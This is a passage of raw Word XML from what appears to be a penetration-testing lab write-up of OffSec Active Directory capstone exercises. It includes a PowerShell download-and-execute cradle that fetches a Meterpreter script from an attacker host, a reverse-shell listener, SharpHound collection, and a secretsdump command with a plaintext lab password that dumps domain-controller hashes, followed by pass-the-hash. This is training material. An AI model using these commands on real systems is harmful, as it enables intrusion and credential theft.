          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Desktop with a shellcode runner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E73C4" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRPr="00122D2B" w:rsidRDefault="008C17DA" w:rsidP="008C17DA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NoExit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IEX(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New-Object System.Net.WebClient).DownloadString('http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;LOCAL_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:8888/run_meterpreter.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71743124" w14:textId="77777777" w:rsidR="008C17DA" w:rsidRDefault="008C17DA"/>
    <w:p w14:paraId="2F5F80FA" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="008C17DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EC852C0" wp14:editId="31F9F578">
            <wp:extent cx="8229600" cy="3841750"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1689255481" name="Picture 46" descr="A computer screen shot of a blue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5481" name="Picture 46" descr="A computer screen shot of a blue flow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8FC" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC"/>
    <w:p w14:paraId="320717AD" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC"/>
    <w:p w14:paraId="64D9FDDE" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC"/>
    <w:p w14:paraId="6ACB467A" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC" w:rsidP="000A04BC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4E7E09">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a Metasploit listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135B9BB4" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC" w:rsidP="000A04BC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C70F2BA" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRPr="00A468F5" w:rsidRDefault="000A04BC" w:rsidP="000A04BC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Pr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="541C9519" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRPr="00A468F5" w:rsidRDefault="000A04BC" w:rsidP="000A04BC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LHOST &lt;LOCAL_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6790BD84" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRPr="00A468F5" w:rsidRDefault="000A04BC" w:rsidP="000A04BC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LPORT 4242</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C35E33" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRPr="00A468F5" w:rsidRDefault="000A04BC" w:rsidP="000A04BC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PAYLOAD windows/x64/meterpreter_reverse_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00019DED" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC" w:rsidP="000A04BC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run -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="39166C1D" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC"/>
    <w:p w14:paraId="79F26E14" w14:textId="19099ACE" w:rsidR="000A04BC" w:rsidRDefault="000A04BC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2084904D" wp14:editId="5DC4719B">
            <wp:extent cx="8229600" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1469574445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74445" name="Picture 4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0419" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC"/>
    <w:p w14:paraId="62323BCD" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC"/>
    <w:p w14:paraId="7B04EA96" w14:textId="77777777" w:rsidR="005600EE" w:rsidRDefault="005600EE" w:rsidP="005600EE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1650B5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SharpHound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to get JSON files for analysis on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A86AF1" w14:textId="77777777" w:rsidR="005600EE" w:rsidRDefault="005600EE" w:rsidP="005600EE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061B4924" w14:textId="77777777" w:rsidR="005600EE" w:rsidRPr="0067421F" w:rsidRDefault="005600EE" w:rsidP="005600EE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Pr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use post/windows/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execute_dotnet_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assembly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5FD19649" w14:textId="77777777" w:rsidR="005600EE" w:rsidRPr="0067421F" w:rsidRDefault="005600EE" w:rsidP="005600EE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67421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>set ARGUMENTS –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CollectionMethods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> All –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OutputDirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\\Users\\Public\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F4ECE" w14:textId="77777777" w:rsidR="005600EE" w:rsidRPr="0067421F" w:rsidRDefault="005600EE" w:rsidP="005600EE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67421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>set DOTNET_EXE &lt;LOCAL PATH TO SharpHound.exe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFEF7F8" w14:textId="77777777" w:rsidR="005600EE" w:rsidRPr="0067421F" w:rsidRDefault="005600EE" w:rsidP="005600EE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67421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A49B5AE" w14:textId="3C7BDBB5" w:rsidR="000A04BC" w:rsidRDefault="005600EE" w:rsidP="005600EE">
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F098DFB" w14:textId="77777777" w:rsidR="000A04BC" w:rsidRDefault="000A04BC"/>
    <w:p w14:paraId="37E3BF8B" w14:textId="79D34661" w:rsidR="005600EE" w:rsidRDefault="005600EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3940023B" wp14:editId="54B46875">
            <wp:extent cx="8229600" cy="3359150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="900834796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34796" name="Picture 4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5DE8" w14:textId="77777777" w:rsidR="005600EE" w:rsidRDefault="005600EE"/>
    <w:p w14:paraId="1D6CFCE4" w14:textId="77777777" w:rsidR="005600EE" w:rsidRDefault="005600EE"/>
    <w:p w14:paraId="0948AF1E" w14:textId="77777777" w:rsidR="005600EE" w:rsidRDefault="005600EE"/>
    <w:p w14:paraId="01FCFA31" w14:textId="7CC5EAAA" w:rsidR="005600EE" w:rsidRDefault="005600EE" w:rsidP="005600EE">
      <w:r w:rsidRPr="005314B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Download the bloodhound.zip from the client75 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B41EE" w14:textId="77777777" w:rsidR="005600EE" w:rsidRDefault="005600EE"/>
    <w:p w14:paraId="4508B767" w14:textId="4227A921" w:rsidR="005600EE" w:rsidRDefault="005600EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06903494" wp14:editId="0DAA2E07">
            <wp:extent cx="8229600" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1810590460" name="Picture 5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0460" name="Picture 51" descr="A computer screen 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6E3" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="02F1F048" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="6FFEB364" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="1F4BA762" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="0CF82953" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="2CD1E06D" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="0A9E8719" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="7C44306F" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA"/>
    <w:p w14:paraId="7A59CFFC" w14:textId="77777777" w:rsidR="002062DA" w:rsidRDefault="002062DA" w:rsidP="002062DA">
      <w:r w:rsidRPr="00147791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unzip the bloodhound.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135ADD42" w14:textId="5639062E" w:rsidR="002062DA" w:rsidRDefault="002062DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64AF025A" wp14:editId="58C160C4">
            <wp:extent cx="8229600" cy="1197610"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="671105220" name="Picture 5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5220" name="Picture 52" descr="A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5476" w14:textId="34282FFA" w:rsidR="002062DA" w:rsidRDefault="002062DA" w:rsidP="002062DA">
      <w:r w:rsidRPr="00147791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Feed the JSON files to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> running locally. (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jeffadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C968B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> has admin rights to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dc1</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA3FBDE" w14:textId="24B024DA" w:rsidR="002062DA" w:rsidRDefault="002062DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1482955E" wp14:editId="4247D4F4">
            <wp:extent cx="8229600" cy="3528695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2082052684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52684" name="Picture 5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81E2" w14:textId="77777777" w:rsidR="00E41676" w:rsidRDefault="00E41676"/>
    <w:p w14:paraId="022515BE" w14:textId="1886ABA7" w:rsidR="00E41676" w:rsidRDefault="00E41676">
      <w:r w:rsidRPr="005D28C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008133AA">
        <w:t>Dump the hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008133AA">
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dc1 </w:t>
      </w:r>
      <w:r w:rsidR="008133AA">
        <w:t xml:space="preserve">(Administrator) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E41676">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jeffadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> credentials provided by offsec. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0B878" w14:textId="44F69608" w:rsidR="008133AA" w:rsidRPr="008133AA" w:rsidRDefault="008133AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008133AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008133AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -just-dc-user Administrator corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.204.70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50048BB5" w14:textId="33AE789A" w:rsidR="00E41676" w:rsidRDefault="008133AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475570A8" wp14:editId="6797B6AC">
            <wp:extent cx="8229600" cy="3831590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8011406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0647" name="Picture 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30BE" w14:textId="77777777" w:rsidR="008F24AC" w:rsidRDefault="008F24AC"/>
    <w:p w14:paraId="0E647652" w14:textId="77777777" w:rsidR="008F24AC" w:rsidRDefault="008F24AC"/>
    <w:p w14:paraId="29C33C5F" w14:textId="77777777" w:rsidR="008F24AC" w:rsidRDefault="008F24AC"/>
    <w:p w14:paraId="25BB02B2" w14:textId="77777777" w:rsidR="008F24AC" w:rsidRDefault="008F24AC"/>
    <w:p w14:paraId="7759CC77" w14:textId="26C80ED9" w:rsidR="003F2C70" w:rsidRDefault="003F2C70">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B630B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B630B2">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Use “</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA084B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pass the hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” to get access to Administrator and get the flag at </w:t>
      </w:r>
      <w:r w:rsidRPr="003F2C70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Users\Administrator\Desktop\flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06921B5C" w14:textId="77777777" w:rsidR="00491D7C" w:rsidRPr="003F2C70" w:rsidRDefault="00491D7C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39AEBB86" w14:textId="25931C95" w:rsidR="008F24AC" w:rsidRDefault="008F24AC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17BC467D" wp14:editId="3C140885">
            <wp:extent cx="8229600" cy="3812540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125078236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82364" name="Picture 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298A" w14:textId="77777777" w:rsidR="00E41676" w:rsidRDefault="00E41676"/>
    <w:p w14:paraId="517A8AD1" w14:textId="77777777" w:rsidR="00E41676" w:rsidRDefault="00E41676"/>
    <w:p w14:paraId="6BC9AD64" w14:textId="2C3E59D8" w:rsidR="00892126" w:rsidRDefault="00892126">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="330DC4D3" w14:textId="1CF4C3D4" w:rsidR="00892126" w:rsidRDefault="00892126" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc147493194"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Capstone Exercise 23.2.2 #3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="165296B9" w14:textId="77777777" w:rsidR="001A3FCD" w:rsidRPr="001A3FCD" w:rsidRDefault="001A3FCD" w:rsidP="001A3FCD"/>
    <w:p w14:paraId="324490EB" w14:textId="77777777" w:rsidR="00892126" w:rsidRDefault="00892126" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc147493195"/>
      <w:r>
        <w:t>Path to Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="46D983F3" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="003A4AA4"/>
    <w:p w14:paraId="4206431E" w14:textId="0BAE949B" w:rsidR="003A4AA4" w:rsidRPr="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00A707A3">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this scenario, the objective is to perform a penetration test on a system called “client74”. This involves gaining remote access via RDP using provided credentials, creating and hosting a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PoweShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload, setting up a Metasploit listener, and utilizing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SharpHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to collect JSON files for analysis with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="006110F3">
        <w:t>goal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is to</w:t>
      </w:r>
      <w:r w:rsidR="00A707A3">
        <w:t xml:space="preserve"> move laterally to FILES04 and retrieve a flag located at C:\Usesrs\Administrator\Desktop\proof.txt on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A411F7" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="2BE843DC" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="2F12FC92" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="1AAC3D7B" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="368BAE80" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="06C13778" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="2E400E9A" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="4DA3FDB2" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="553F7458" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="5DF173B4" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="61D2F3E9" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="1CE99466" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="42E50402" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="3BEA7284" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRPr="00F94FC9" w:rsidRDefault="003A4AA4" w:rsidP="00892126"/>
    <w:p w14:paraId="23E2CA0B" w14:textId="77777777" w:rsidR="00892126" w:rsidRDefault="00892126" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
